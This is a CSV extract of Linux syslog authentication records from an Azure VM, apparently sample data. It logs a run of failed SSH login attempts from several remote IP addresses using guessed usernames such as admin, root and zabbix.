+10506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:28,UbuntuDevEnv,2019-06-25 23:38:27,auth,UbuntuDevEnv,info,Invalid user testftp from 203.195.235.135 port 53334,61478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,203.195.235.1,53334,,
+10507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:28,UbuntuDevEnv,2019-06-25 23:38:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:28,UbuntuDevEnv,2019-06-25 23:38:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,61478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:29,UbuntuDevEnv,2019-06-25 23:38:28,auth,UbuntuDevEnv,info,Failed password for invalid user testftp from 203.195.235.135 port 53334 ssh2,61478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,203.195.235.1,53334,,
+10510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:29,UbuntuDevEnv,2019-06-25 23:38:29,auth,UbuntuDevEnv,info,Disconnected from invalid user testftp 203.195.235.135 port 53334 [preauth],61478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,203.195.235.1,53334,,
+10511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:29,UbuntuDevEnv,2019-06-25 23:38:29,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 53334:11: Bye Bye [preauth],61478,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,53334,,
+10512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:38,UbuntuDevEnv,2019-06-25 23:38:38,auth,UbuntuDevEnv,info,Invalid user zou from 138.68.12.43 port 40644,61508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zou,138.68.12.4,40644,,
+10513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:38,UbuntuDevEnv,2019-06-25 23:38:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,61508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:38,UbuntuDevEnv,2019-06-25 23:38:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:40,UbuntuDevEnv,2019-06-25 23:38:40,auth,UbuntuDevEnv,info,Failed password for invalid user zou from 138.68.12.43 port 40644 ssh2,61508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zou,138.68.12.4,40644,,
+10516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:40,UbuntuDevEnv,2019-06-25 23:38:40,auth,UbuntuDevEnv,info,Disconnected from invalid user zou 138.68.12.43 port 40644 [preauth],61508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zou,138.68.12.4,40644,,
+10517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:40,UbuntuDevEnv,2019-06-25 23:38:40,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 40644:11: Bye Bye [preauth],61508,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,40644,,
+10518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:59,UbuntuDevEnv,2019-06-25 23:38:58,auth,UbuntuDevEnv,info,Invalid user cvsuser from 88.247.110.88 port 64394,61588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cvsuser,88.247.110.8,64394,,
+10519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:59,UbuntuDevEnv,2019-06-25 23:38:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:59,UbuntuDevEnv,2019-06-25 23:38:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,61588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:00,UbuntuDevEnv,2019-06-25 23:39:00,auth,UbuntuDevEnv,info,Failed password for invalid user cvsuser from 88.247.110.88 port 64394 ssh2,61588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cvsuser,88.247.110.8,64394,,
+10522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:00,UbuntuDevEnv,2019-06-25 23:39:00,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 64394:11: Bye Bye [preauth],61588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,64394,,
+10523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:00,UbuntuDevEnv,2019-06-25 23:39:00,auth,UbuntuDevEnv,info,Disconnected from invalid user cvsuser 88.247.110.88 port 64394 [preauth],61588,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cvsuser,88.247.110.8,64394,,
+10524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:26,UbuntuDevEnv,2019-06-25 23:39:25,auth,UbuntuDevEnv,info,Invalid user server from 203.195.235.135 port 34352,61678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,203.195.235.1,34352,,
+10525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:26,UbuntuDevEnv,2019-06-25 23:39:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,61678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:26,UbuntuDevEnv,2019-06-25 23:39:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:28,UbuntuDevEnv,2019-06-25 23:39:27,auth,UbuntuDevEnv,info,Failed password for invalid user server from 203.195.235.135 port 34352 ssh2,61678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,203.195.235.1,34352,,
+10528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:29,UbuntuDevEnv,2019-06-25 23:39:28,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 34352:11: Bye Bye [preauth],61678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,34352,,
+10529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:39:29,UbuntuDevEnv,2019-06-25 23:39:28,auth,UbuntuDevEnv,info,Disconnected from invalid user server 203.195.235.135 port 34352 [preauth],61678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,203.195.235.1,34352,,
+10530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:15,UbuntuDevEnv,2019-06-25 23:40:14,auth,UbuntuDevEnv,info,Invalid user admin from 196.27.127.61 port 37440,61860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,196.27.127.6,37440,,
+10531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:15,UbuntuDevEnv,2019-06-25 23:40:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:15,UbuntuDevEnv,2019-06-25 23:40:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,61860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:17,UbuntuDevEnv,2019-06-25 23:40:17,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 196.27.127.61 port 37440 ssh2,61860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,196.27.127.6,37440,,
+10534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:17,UbuntuDevEnv,2019-06-25 23:40:17,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 37440:11: Bye Bye [preauth],61860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,37440,,
+10535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:17,UbuntuDevEnv,2019-06-25 23:40:17,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 196.27.127.61 port 37440 [preauth],61860,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,196.27.127.6,37440,,
+10536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:21,UbuntuDevEnv,2019-06-25 23:40:20,auth,UbuntuDevEnv,info,Invalid user arma3server from 203.195.235.135 port 43492,61887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arma3server,203.195.235.1,43492,,
+10537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:21,UbuntuDevEnv,2019-06-25 23:40:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:21,UbuntuDevEnv,2019-06-25 23:40:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,61887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:23,UbuntuDevEnv,2019-06-25 23:40:22,auth,UbuntuDevEnv,info,Failed password for invalid user arma3server from 203.195.235.135 port 43492 ssh2,61887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arma3server,203.195.235.1,43492,,
+10540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:23,UbuntuDevEnv,2019-06-25 23:40:22,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 43492:11: Bye Bye [preauth],61887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,43492,,
+10541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:23,UbuntuDevEnv,2019-06-25 23:40:22,auth,UbuntuDevEnv,info,Disconnected from invalid user arma3server 203.195.235.135 port 43492 [preauth],61887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arma3server,203.195.235.1,43492,,
+10542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:52,UbuntuDevEnv,2019-06-25 23:40:51,auth,UbuntuDevEnv,info,Invalid user kuo from 138.68.12.43 port 56838,61989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kuo,138.68.12.4,56838,,
+10543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:52,UbuntuDevEnv,2019-06-25 23:40:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:52,UbuntuDevEnv,2019-06-25 23:40:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,61989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:54,UbuntuDevEnv,2019-06-25 23:40:53,auth,UbuntuDevEnv,info,Failed password for invalid user kuo from 138.68.12.43 port 56838 ssh2,61989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kuo,138.68.12.4,56838,,
+10546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:54,UbuntuDevEnv,2019-06-25 23:40:54,auth,UbuntuDevEnv,info,Disconnected from invalid user kuo 138.68.12.43 port 56838 [preauth],61989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kuo,138.68.12.4,56838,,
+10547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:40:54,UbuntuDevEnv,2019-06-25 23:40:54,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 56838:11: Bye Bye [preauth],61989,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,56838,,
+10548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:41:27,UbuntuDevEnv,2019-06-25 23:41:26,auth,UbuntuDevEnv,info,Invalid user zabbix from 203.195.235.135 port 52656,62107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,203.195.235.1,52656,,
+10549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:41:27,UbuntuDevEnv,2019-06-25 23:41:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,62107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:41:27,UbuntuDevEnv,2019-06-25 23:41:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:41:29,UbuntuDevEnv,2019-06-25 23:41:28,auth,UbuntuDevEnv,info,Failed password for invalid user zabbix from 203.195.235.135 port 52656 ssh2,62107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,203.195.235.1,52656,,
+10552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:41:30,UbuntuDevEnv,2019-06-25 23:41:29,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 52656:11: Bye Bye [preauth],62107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,52656,,
+10553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:41:30,UbuntuDevEnv,2019-06-25 23:41:29,auth,UbuntuDevEnv,info,Disconnected from invalid user zabbix 203.195.235.135 port 52656 [preauth],62107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,203.195.235.1,52656,,
+10554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:08,UbuntuDevEnv,2019-06-25 23:42:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61  user=root,62270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,196.27.127.6,,0,
+10555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:10,UbuntuDevEnv,2019-06-25 23:42:10,auth,UbuntuDevEnv,info,Failed password for root from 196.27.127.61 port 45761 ssh2,62270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,45761,,
+10556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:10,UbuntuDevEnv,2019-06-25 23:42:10,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 45761:11: Bye Bye [preauth],62270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,45761,,
+10557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:10,UbuntuDevEnv,2019-06-25 23:42:10,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 196.27.127.61 port 45761 [preauth],62270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,196.27.127.6,45761,,
+10558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:11,UbuntuDevEnv,2019-06-25 23:42:11,auth,UbuntuDevEnv,info,Invalid user apagar from 114.112.81.180 port 56508,62281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apagar,114.112.81.1,56508,,
+10559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:11,UbuntuDevEnv,2019-06-25 23:42:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,62281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:11,UbuntuDevEnv,2019-06-25 23:42:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:13,UbuntuDevEnv,2019-06-25 23:42:13,auth,UbuntuDevEnv,info,Failed password for invalid user apagar from 114.112.81.180 port 56508 ssh2,62281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apagar,114.112.81.1,56508,,
+10562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:14,UbuntuDevEnv,2019-06-25 23:42:13,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 56508:11: Bye Bye [preauth],62281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,56508,,
+10563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:14,UbuntuDevEnv,2019-06-25 23:42:13,auth,UbuntuDevEnv,info,Disconnected from invalid user apagar 114.112.81.180 port 56508 [preauth],62281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apagar,114.112.81.1,56508,,
+10564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:23,UbuntuDevEnv,2019-06-25 23:42:22,auth,UbuntuDevEnv,info,Invalid user ronald from 203.195.235.135 port 33754,62327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ronald,203.195.235.1,33754,,
+10565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:42:23,UbuntuDevEnv,2019-06-25 23:42:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,62327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
